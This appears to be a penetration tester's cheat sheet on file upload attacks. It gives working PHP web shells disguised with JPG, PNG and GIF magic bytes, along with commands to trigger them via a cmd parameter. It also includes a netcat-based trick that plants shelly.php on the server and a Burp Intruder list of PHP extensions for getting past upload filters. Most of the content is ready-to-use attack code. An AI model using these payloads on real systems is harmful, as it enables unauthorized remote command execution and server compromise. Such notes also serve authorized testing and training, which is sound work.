#### formats
Windows: Try asp, aspx, hta, doc malicious file uploads.
Web: Try php
#### weevely
[[Weevely]]
#### filter bypass
Inspect for filters from web page:
Right click on "Chose File" button > Inspect
Look for some form of "accept=" property.
ALSO, look in main file, such as main.js
Look into `allowedMimeType` for file types.
In this example, we see we can upload xml files.
[[11._XML XXE#Quick file upload win]]
#### Magic bytes
Magic bytes are used to identify the type of the file, and are usually found at the beginning of it. Other files have the magic bytes at their offset, while some other files (such as plain text files) do not have magic bytes at all. The position of the magic bytes also varies on different filesystems.
JPG:
Adding magic bytes for the JPG format to our PHP file might let us bypass this check.  We can refer to the list of magic bytes at https://en.wikipedia.org/wiki/List_of_file_signatures.
Valid magic bytes for a JPG/JPEG file are:
1. `FF D8 FF DB`
2. `FF D8 FF E0 00 10 4A 46 49 46 00 01`
3. `FF D8 FF EE`
4. `FF D8 FF E1 ?? ?? 45 78 69 66 00 00`
```bash - kali
echo 'FFD8FFDB' | xxd -r -p > webshell.php.jpg
```
```bash - kali
echo '<?=`$_GET[cmd]`?>' >> webshell.php.jpg
```
`http://$TARGET/uploads/webshell.php.jpg?cmd=whoami`
PNG:
The magic bytes for PNG are:
1. `89 50 4E 47 0D 0A 1A 0A`
```bash - kali
echo '89504E470D0A1A0A' | xxd -r -p > webshell.php.png
```
```bash - kali
echo '<?=`$_GET[cmd]`?>' >> webshell.php.png
```
`http://$TARGET/uploads/webshell.php.png?cmd=whoami`
#### GIF
Upload Shelly.php as a "GIF"
```
GIF8;
<?php echo system($_REQUEST['cmd']); ?>
```
#### File upload webshell
Set listener on port 4444 to output any connection to shelly.php.
```php
<?php echo exec('nc -lvnp 4444 > shelly.php 2>&1'); ?>.php
```
Use nc to connect and transfer shelly.php.
```bash - kali
nc -nv IP 4444 < shelly.php
```
Visit file upload to connect reverse shell.
### Bypassing extension limits.
1. Capture and upload in Burp.
2. Send to Intruder.
3. Dictionary attack the extension (PHP example below).
```burpsuite - kali
php
php3
php4
php5
phtml
```
